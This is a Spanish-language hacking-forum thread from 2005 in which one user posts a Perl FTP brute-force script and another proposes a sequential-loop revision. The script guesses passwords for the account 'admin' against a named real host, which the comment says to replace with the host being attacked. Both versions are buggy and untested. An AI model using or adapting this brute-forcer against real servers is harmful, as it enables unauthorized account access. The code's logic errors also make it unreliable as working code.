elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: (TUTORIAL) Aprende a emular Sentinel Dongle By Yapis


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  ~Mi primer Ftp Brute Force en Perl.~
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: ~Mi primer Ftp Brute Force en Perl.~  (Leído 4,882 veces)
sikik


Desconectado Desconectado

Mensajes: 665


Jo sóc jo i la meva circumstància.


Ver Perfil
~Mi primer Ftp Brute Force en Perl.~
« en: 27 Junio 2005, 14:45 pm »

Estos dias de vacas me he puesto a programar un poco de perl, y esta mañana he terminado un brute force en perl, os dejo aqui el code

Código
  1. #!/usr/bin/perl
  2. #este programa va probando palabras  de la lista @letras hasta que encuentra la contraseña correcta.
  3. #este script esta hecho por sikik, bajo licencia bsd.
  4.  
  5. use Net::FTP;
  6. $username=admin; #se podria hacer tambien en brute force, pero seria muy lento.
  7. $dead=0;
  8.  
  9. while(1)
  10. {
  11.  
  12. @letras=(a, b,  c, aa, ab, ac, ba, bb, bc, ca, cb, cc); #si quieres usarlo tendras que poner una lista mucho mas larga.
  13. $posicion=rand(12);
  14. $password=@letras[$posicion];
  15.    $ftp = Net::FTP->new("www.microsoft.com", Debug => 0) or $dead=1; #hay que cambiar www.microsoft.com por el host que atacamos.
  16.  
  17.  
  18. $ftp->login($username, $password) or $dead=1;
  19. if($dead==0)
  20. {
  21. die("Contraseña encontrada, el password es: $password");
  22.  
  23. }
  24. };


« Última modificación: 30 Noviembre 2009, 15:12 pm por Novlucker » En línea

"Social Engineer -> Because there is no patch for human stupidity".
"Però qui s'ha inclinat sobre l'abisme, qui ha vist, patirà per sempre la temptació de tornar un altre cop a aquest punt negre en el qual les tenebres il·luminen(...)"
Warning: shell_exec() has been disabled for security reasons at line 274.
pepel


Desconectado Desconectado

Mensajes: 1.099


Uno más


Ver Perfil
Re: ~Mi primer Ftp Brute Force en Perl.~
« Respuesta #1 en: 27 Junio 2005, 15:50 pm »

tal y como esta hecho puede que repitas varias veces el mismo pass = Poco optimo.(al igual que ya que no vamos acambiar el array letras, mejor ponerlo fuera del bucle) mejor si cambias el bucle por este:

Código
  1. @letras=(a, b,  c, aa, ab, ac, ba, bb, bc, ca, cb, cc); #si quieres usarlo tendras que poner una lista mucho mas larga.
  2. $posicion=0;
  3. while( $posicion < length(letras))
  4. {
  5. $posicion=$posicion+1;
  6. $password=@letras[$posicion];
  7.    $ftp = Net::FTP->new("www.microsoft.com", Debug => 0) or $dead=1; #hay que cambiar www.microsoft.com por el host que atacamos.
  8.  
  9. $ftp->login($username, $password) or $dead=1;
  10. if($dead==0)
  11. {
  12. die("Contraseña encontrada, el password es: $password");
  13.  
  14. }
  15. };

saludos,
   pepel

P.D. codigo no probado xD


« Última modificación: 30 Noviembre 2009, 15:12 pm por Novlucker » En línea

Para algunos, la vida es galopar un camino empedrado de horas, minutos y segundos.
Yo, más humilde soy, y sólo quiero que la ola que surge del último suspiro de un segundo, me transporte mecido hasta el siguiente.
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[Perl](Calculadora) Mi primer programa
Scripting
Niko^ 1 4,201 Último mensaje 13 Diciembre 2010, 08:18 am
por leogtz
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines